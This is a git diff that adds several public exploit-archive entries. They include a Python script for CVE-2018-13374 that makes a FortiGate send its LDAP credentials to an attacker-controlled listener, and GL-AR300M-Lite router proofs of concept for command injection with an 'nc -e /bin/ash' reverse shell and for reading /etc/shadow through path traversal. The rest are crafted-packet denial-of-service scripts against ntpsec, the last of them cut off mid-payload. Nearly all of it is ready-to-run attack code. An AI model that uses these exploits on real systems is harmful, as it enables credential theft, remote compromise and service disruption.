diff --git a/exploits/hardware/webapps/46171.py b/exploits/hardware/webapps/46171.py new file mode 100755 index 000000000..38f12d48a --- /dev/null +++ b/exploits/hardware/webapps/46171.py @@ -0,0 +1,144 @@ +#/usr/bin/python3 + +""" +CVE-2018-13374 +Publicado por Julio Ureña (PlainText) +Twitter: @JulioUrena +Blog Post: https://plaintext.do/My-1st-CVE-Capture-LDAP-Credentials-From-FortiGate-EN/ +Referencia: https://fortiguard.com/psirt/FG-IR-18-157 + +Ejemplo: python3 CVE-2018-13374.py -f https://FortiGateIP -u usuario -p password -i MiIP +Ejemplo con Proxy: python3 CVE-2018-13374.py -f https://FortiGateIP -u usuario -p password -i MiIP --proxy http://127.0.0.1:8080 +""" + +from threading import Thread +from time import sleep +import json, requests, socket, sys, re, click + +# Disable SSL Warning +requests.packages.urllib3.disable_warnings() + +# To keep the Cookies after login. +s = requests.Session() + +def AccessFortiGate(fortigate_url, username, password, proxy_addr): + url_login = fortigate_url+'/logincheck' + + # Pass username and Password + payload = {"ajax": 1, "username":username, "secretkey":password} + + # verify=False - to avoid SSL warnings + r = s.post(url_login, data=payload, proxies=proxy_addr, verify=False) + + if s.cookies: + return True + else: + return False + + +def TriggerVuln(fortigate_url, ip, proxy_addr): + print("[+] Triggering Vulnerability") + # Access LDAP Server TAB + r = s.get(fortigate_url+'/p/user/ldap/json/',cookies=requests.utils.dict_from_cookiejar(s.cookies), proxies=proxy_addr, verify=False) + + # Load the response in a json object + json_data = json.loads(r.text) + + # Assign values based on FortiGate LDAP configuration + name = json_data['source'][0]['name'] + username = json_data['source'][0]['username'] + port = int(json_data['source'][0]['port']) + cnid = json_data['source'][0]['cnid'] + dn = json_data['source'][0]['dn'] + ca = json_data['source'][0]['ca-cert'] + + thread = Thread(target = GetCreds, args = (ip, port)) + thread.start() + sleep(1) + + print("[+] Username: ", username) + + # Create json object for the vulnerable request, changing the server and setting up secure to 0 + ldap_request = {"info_only":1,"mkey":name,"ldap":{"server":ip,"port":port,"cn_id":cnid,"username":username,"dn":dn,"secure":0,"ca":ca,"type":2}} + + # Trigger the vulnerability + r = s.get(fortigate_url+'/api/ldap?json='+str(ldap_request), cookies=requests.utils.dict_from_cookiejar(s.cookies),proxies=proxy_addr, verify=False) + r.close() + +def GetCreds(server, port): + sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) + + # Allow to reuse the server/port in case of: OSError: [Errno 98] Address already in use + sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1) + + server_address = (server, port) + sock.bind(server_address) + + sock.listen() + credentials = '' + + while True: + print('[+] Waiting Fortigate connection ...') + c, client_address = sock.accept() + try: + while True: + data = c.recv(1024) + credentials = str(data) + # \\x80\\ was common with 3 different passwords / user names, that's why it's been used as reference. + # It separe the username and the password + ldap_pass = re.sub(r'.*\\x80\\','',credentials) #.replace("'","") + print("[+] Password: ", ldap_pass[3:-1]) + break + finally: + c.shutdown(socket.SHUT_RDWR) + c.close() + sock.shutdown(socket.SHUT_RDWR) + sock.close() + + if credentials: + break + +def print_help(self, param, value): + if value is False: + return + click.echo(self.get_help()) + self.exit() + +@click.command() +@click.option('-f', '--fortigate-url', 'fortigate_url', help='FortiGate URL.', required=True) +@click.option('-u', '--username', 'username', help='Username to login into Fortigate. It can be a read only user.', required=True) +@click.option('-p', '--password', 'password', help='Password to login into FortiGate.', required=True) +@click.option('-i', '--ip', 'ip', help='Host IP to send the credentails.', required=True) +@click.option('-pr', '--proxy', 'proxy', default=None, help='Proxy protocol and IP and Port.', required=False) +@click.option('-h', '--help', 'help', help='Help', is_flag=True, callback=print_help, expose_value=False, is_eager=False) +@click.pass_context + + +def main(self, fortigate_url, username, password, ip, proxy): + if not fortigate_url and not username and not password: + print_help(self, None, value=True) + print("[-] For usage reference use --help") + exit(0) + + # Configure Proxy For Web Requests + proxy_addr = { + 'http': proxy, + 'https': proxy + } + message = """[+] CVE-2018-13374 +[+] Publicado por Julio Ureña (PlainText) +[+] Blog: https://plaintext.do +[+] Referencia: https://fortiguard.com/psirt/FG-IR-18-157 +""" + print(message) + + if AccessFortiGate(str(fortigate_url),username, password, proxy_addr): + print("[+] Logged in.") + sleep(1) + TriggerVuln(str(fortigate_url), ip, proxy_addr) + else: + print("[-] Unable to login. Please check the credentials and Fortigate URL.") + exit(0) + +if __name__ == "__main__": + main() \ No newline at end of file diff --git a/exploits/hardware/webapps/46179.txt b/exploits/hardware/webapps/46179.txt new file mode 100644 index 000000000..e03fa1f4e --- /dev/null +++ b/exploits/hardware/webapps/46179.txt @@ -0,0 +1,76 @@ +# Exploit Title: GL-AR300M-Lite Authenticated Command injection - Arbitrary file download - Directory Traversal +# Date: 15/1/2019 +# Exploit Author: Pasquale Turi aka boombyte +# Vendor Homepage: https://www.gl-inet.com/ +# Software Link: https://www.gl-inet.com/products/gl-ar300m/ +# Version: Firmware version 2.27 +# CVE : CVE-2019-6272 - CVE-2019-6273 - CVE-2019-6274 - CVE-2019-6275 + + +#CVE-2019-6272 PoC (Command injection): + +import requests + +rhost='RHOST' +lhost='LHOST' +lport ='LPORT' +password='PASSWORD' +r=requests.get('http://'+rhost+'/login.html') +cookie=r.cookies +r2=requests.get('http://'+rhost+'/cgi-bin/login_cgi?action=checklogin',cookies=cookie) +header={'X-CSRF-TOKEN':r2.text[13:45]} +r3=requests.post('http://'+rhost+'/cgi-bin/login_cgi',headers=header,cookies=r2.cookies,data={'action':'login','password':password,'code':''}) +header={'X-CSRF-TOKEN':r3.text[31:63]} +r4=requests.post('http://'+rhost+'/cgi-bin/login_cgi',headers=header,cookies=r3.cookies,data={'action':'settimezone','timezone':'`nc '+lhost+' '+lport+' -e /bin/ash`'}) + + +#CVE-2019-6273 (Arbitrary file download) PoC: + +import requests + +rhost='RHOST' +password='PASSWORD' +file_path='/etc/shadow' +r=requests.get('http://'+rhost+'/login.html') +cookie=r.cookies +r2=requests.get('http://'+rhost+'/cgi-bin/login_cgi?action=checklogin',cookies=cookie) +header={'X-CSRF-TOKEN':r2.text[13:45]} +r3=requests.post('http://'+rhost+'/cgi-bin/login_cgi',headers=header,cookies=r2.cookies,data={'action':'login','password':password,'code':''}) +header={'X-CSRF-TOKEN':r3.text[31:63]} +r4=requests.get('http://'+rhost+'/cgi-bin/download_file?/mnt/..'+file_path,headers=header,cookies=r3.cookies) +print r4.text + + +#CVE-2019-6274 (Path Trasversal) PoC: + +import requests + +rhost='RHOST' +password='PASSWORD' +path='/' +r=requests.get('http://'+rhost+'/login.html') +cookie=r.cookies +r2=requests.get('http://'+rhost+'/cgi-bin/login_cgi?action=checklogin',cookies=cookie) +header={'X-CSRF-TOKEN':r2.text[13:45]} +r3=requests.post('http://'+rhost+'/cgi-bin/login_cgi',headers=header,cookies=r2.cookies,data={'action':'login','password':password,'code':''}) +header={'X-CSRF-TOKEN':r3.text[31:63]} +r4=requests.get('http://'+rhost+'/cgi-bin/storage_cgi?id=2&pwd='+path,headers=header,cookies=r3.cookies) +print r4.text + + +#CVE-2019-6275 (Another command injection): + +import requests + +rhost='RHOST' +lhost='LHOST' +lport ='LPORT' +password='PASSWORD' +r=requests.get('http://'+rhost+'/login.html') +cookie=r.cookies +r2=requests.get('http://'+rhost+'/cgi-bin/login_cgi?action=checklogin',cookies=cookie) +header={'X-CSRF-TOKEN':r2.text[13:45]} +r3=requests.post('http://'+rhost+'/cgi-bin/login_cgi',headers=header,cookies=r2.cookies,data={'action':'login','password':password,'code':''}) +header={'X-CSRF-TOKEN':r3.text[31:63]} +r4=requests.post('http://'+rhost+'/cgi-bin/firmware_cgi?action=setautoupdate&auto_update=off&update_time=04%3a00%7cecho%20qydre8t159%201%7c%7ca%20%23\'%20%7cecho%20%20%60id%60%7c%7ca%20%23%7c%22%20%7cecho%20a%201%7c%7ca%20%23&_=1547223055153 ',headers=header,cookies=r3.cookies,) +print r4.text \ No newline at end of file diff --git a/exploits/hardware/webapps/46180.html b/exploits/hardware/webapps/46180.html new file mode 100644 index 000000000..72c78d71f --- /dev/null +++ b/exploits/hardware/webapps/46180.html @@ -0,0 +1,32 @@ + + + + +
+ + + + \ No newline at end of file diff --git a/exploits/linux/dos/46175.py b/exploits/linux/dos/46175.py new file mode 100755 index 000000000..7db3fbd01 --- /dev/null +++ b/exploits/linux/dos/46175.py @@ -0,0 +1,111 @@ +#!/usr/bin/env python +# Exploit Title: ntpsec 1.1.2 OOB read Proof of concept +# Bug Discovery: Magnus Klaaborg Stubman (@magnusstubman) +# Exploit Author: Magnus Klaaborg Stubman (@magnusstubman) +# Website: https://dumpco.re/bugs/ntpsec-oobread1 +# Vendor Homepage: https://ntpsec.org/ +# Software Link: ftp://ftp.ntpsec.org/pub/releases/ntpsec-1.1.2.tar.gz +# Affected versions: ntpsec 1.1.1, 1.1.2 +# CVE: CVE-2019-6443 +# Note: this PoC does not crash the target + +import sys +import socket + +buf = ("\x4e\x02\x03\xec\x00\x00\x00\x00\x00\x00\x02\xc7\x74\x63\x3d\x10" + + "\x00\xaf\x2c\x2c\x2c\x2c\xfa\x00\x00\xfa\x0b\x0b\x0b\x0b\x0b\x0b" + + "\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b" + + "\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x06\x0b\x0b\xce\x0b\x14\x0b\x0b" + + "\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x21\x0b\x0b" + + "\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x06\x0b\x0b" + + "\xce\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\xe4\xe4\xe5\x0b\x0b" + + "\x0b\x0b\x20\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x3d\x63\x3d\xac\x0b\x0b" + + "\x0b\x0b\x2d\x27\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b" + + "\x0b\x80\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b" + + "\x0b\x0b\x0b\x0b\xff\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b" + + "\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b" + + "\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b" + + "\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b" + + "\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b" + + "\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b" + + "\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b" + + "\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b" + + "\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b" + + "\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b" + + "\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b" + + "\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b" + + "\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b" + + "\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b" + + "\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b" + + "\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b" + + "\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b" + + "\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b" + + "\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b" + + "\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b" + + "\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b" + + "\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b" + + "\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b" + + "\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b" + + "\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b" + + "\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b" + + "\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b" + + "\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b" + + "\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b" + + "\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b" + + "\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b" + + "\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b" + + "\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b" + + "\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b" + + "\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b" + + "\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b" + + "\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b" + + "\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b" + + "\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b" + + "\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b" + + "\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b" + + "\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b" + + "\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b" + + "\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b" + + "\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b" + + "\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b" + + "\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b" + + "\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b" + + "\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b" + + "\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b" + + "\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b" + + "\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b" + + "\x02\x0b\x0b\x0b\x0b\x0b\x18\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b" + + "\x0b\x0b\x0b\x00\x00\x00\x02\xc7\x74\x63\x3d\x10\x00\xaf\x2c\x2c" + + "\x2c\x2c\xfa\x00\x00\xfa\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b" + + "\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b" + + "\x0b\x0b\x0b\x0b\x06\x0b\x0b\xce\x0b\x14\x0b\x0b\x0b\x0b\x0b\x0b" + + "\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x21\x0b\x0b\x0b\x0b\x0b\x0b" + + "\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x06\x0b\x0b\xce\x0b\x0b\x0b" + + "\x0b\x0b\x0b\x0b\x0b\x0b\x0b\xe4\xe4\xe5\x0b\x0b\x0b\x0b\x20\x0b" + + "\x0b\x0b\x0b\x0b\x0b\x0b\x3d\x63\x3d\xac\x0b\x0b\x0b\x0b\x2d\x27" + + "\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x80\x0b\x0b" + + "\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b" + + "\xff\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b" + + "\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x02\x0b\x0b\x0b\x0b\x0b\x18\x0b" + + "\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b" + + "\x0b\x0b\x0b\x0b\x0e\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b" + + "\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b" + + "\x0b\x0b\x0b\x4b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b" + + "\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x3b\xa9\x48\xdd\x00\x04\x0b" + + "\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b" + + "\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0e\x0b\x0b" + + "\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b" + + "\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x4b\x0b\x0b\x0b" + + "\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b" + + "\x0b\x0b\x3b\xa9\x48\xdd\x00\x04\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b" + + "\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b" + + "\x0b\x07") + +sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) +sock.sendto(buf, ('127.0.0.1', 123)) + + + + + +Magnus \ No newline at end of file diff --git a/exploits/linux/dos/46176.py b/exploits/linux/dos/46176.py new file mode 100755 index 000000000..d44fac107 --- /dev/null +++ b/exploits/linux/dos/46176.py @@ -0,0 +1,56 @@ +#!/usr/bin/env python +# Exploit Title: ntpsec 1.1.2 OOB read Proof of concept +# Bug Discovery: Magnus Klaaborg Stubman (@magnusstubman) +# Exploit Author: Magnus Klaaborg Stubman (@magnusstubman) +# Website: https://dumpco.re/bugs/ntpsec-oobread2 +# Vendor Homepage: https://ntpsec.org/ +# Software Link: ftp://ftp.ntpsec.org/pub/releases/ntpsec-1.1.2.tar.gz +# Affected versions: ntpsec 1.1.1, 1.1.2 +# CVE: CVE-2019-6444 +# Note: this PoC does not crash the target + +import sys +import socket + +buf = ("\x8e\x0a\x6b\xc3\x80\x00\x00\x00\x00\x00\x02\x48\x47\x50\x53\x73" + + "\x6b\xc3\x80\x00\x00\x00\x00\x00\x02\x48\x47\x50\x53\x73\xdd\xb5" + + "\xc9\x64\xcf\x8a\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b" + + "\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b" + + "\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b" + + "\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b" + + "\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b" + + "\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b" + + "\x2b\x44\x47\x50\x10\x00\x47\xb5\xc9\xcf\x97\xbb\x00\xe5\xf8\xdd" + + "\xb5\xc9\x6b\xd8\x7f\x81\xc2\xdd\xb5\xc9\x6b\xdd\x80\xe4\xe4\xe5" + + "\x9f\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b" + + "\x2b\x21\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b" + + "\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b" + + "\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b" + + "\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b" + + "\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b" + + "\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b" + + "\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b" + + "\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b" + + "\x2b\x2b\x2b\x2b\xc5\xbf\xbc\x6b\xd8\x7f\x82\x00\x2b\x2b\x2b\x2b" + + "\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b" + + "\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b" + + "\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b" + + "\x42\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b" + + "\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b" + + "\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b" + + "\x2b\x2b\x2b\x2b\x2b\x2b\xed\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b" + + "\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b" + + "\x2b\x2b\x00\x00\xe4\xe4\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b" + + "\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b" + + "\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b" + + "\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x00" + + "\x01\x00\x00\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b" + + "\x2b\x2b\x2b\x2b\x29\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b" + + "\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b" + + "\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b" + + "\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x97\x48\xdd\xb5\xc9\x6b" + + "\xbb\xe8\x08\xf8\xdd\xba\xc9\x6b\xd8\x7f\x82\xc2\xdd\xb5\xc9\x6b" + + "\xd8\x80\x57\x9f") + +sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) +sock.sendto(buf, ('127.0.0.1', 123)) \ No newline at end of file diff --git a/exploits/linux/dos/46177.py b/exploits/linux/dos/46177.py new file mode 100755 index 000000000..474bc7356 --- /dev/null +++ b/exploits/linux/dos/46177.py @@ -0,0 +1,20 @@ +#!/usr/bin/env python +# Exploit Title: ntpsec 1.1.2 authenticated NULL pointer exception Proof of concept +# Bug Discovery: Magnus Klaaborg Stubman (@magnusstubman) +# Exploit Author: Magnus Klaaborg Stubman (@magnusstubman) +# Website: https://dumpco.re/bugs/ntpsec-authed-npe +# Vendor Homepage: https://ntpsec.org/ +# Software Link: ftp://ftp.ntpsec.org/pub/releases/ntpsec-1.1.2.tar.gz +# Affected versions: ntpsec 1.1.0, 1.1.1, 1.1.2 +# CVE: CVE-2019-6445 +# Note: this PoC uses Keyid 1 with password 'gurka' + +import sys +import socket + +buf = ("\x16\x03\x00\x03\x00\x00\x00\x00\x00\x00\x00\x04\x6c\x65\x61\x70" + + "\x00\x00\x00\x01\x5c\xb7\x3c\xdc\x9f\x5c\x1e\x6a\xc5\x9b\xdf\xf5" + + "\x56\xc8\x07\xd4") + +sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) +sock.sendto(buf, ('127.0.0.1', 123)) \ No newline at end of file diff --git a/exploits/linux/dos/46178.py b/exploits/linux/dos/46178.py new file mode 100755 index 000000000..5ca0be959 --- /dev/null +++ b/exploits/linux/dos/46178.py @@ -0,0 +1,49 @@ +#!/usr/bin/env python +# Exploit Title: ntpsec 1.1.2 authenticated out of bounds write proof of concept DoS +# Bug Discovery: Magnus Klaaborg Stubman (@magnusstubman) +# Exploit Author: Magnus Klaaborg Stubman (@magnusstubman) +# Website: https://dumpco.re/bugs/ntpsec-authed-oobwrite +# Vendor Homepage: https://ntpsec.org/ +# Software Link: ftp://ftp.ntpsec.org/pub/releases/ntpsec-1.1.2.tar.gz +# Affected versions: all versions of ntpsec including, and prior to 1.1.2. +# CVE: CVE-2019-6442 +# Note: this PoC uses Keyid 1 with password ‘gurka’ + +import sys +import socket + +buf = ("\x16\x08\x00\x03\x00\x00\x00\x00\x00\x00\x01\xd4\x6c\x65\x61\x6d" + + "\x3d\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x42\x42\x42\x42\x42" + + "\x42\x42\x42\x42\x42\x41\x41\x41\x41\x41\x41\x41\x34\x41\x41\x42" + + "\x42\x42\x42\x42\x42\x42\x42\x42\x42\x41\x41\x41\x41\x41\x41\x41" + + "\x41\x41\x41\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x41\x41\x41" + + "\x42\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x42\x42\x42\x42\x42" + + "\x42\x42\x42\x42\x42\x31\x32\x33\x34\x35\x3e\x37\x38\x39\x30\x31" + + "\x32\x33\x34\x35\x36\x37\x38\x39\x30\x31\x32\x33\x34\x35\x36\x37" + + "\x38\x39\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x20\x2d\x36\x33" + + "\x34\x35\x36\x37\x38\x39\x30\x31\x32\x38\x3d\x20\x2d\x36\x4a\x0a" + + 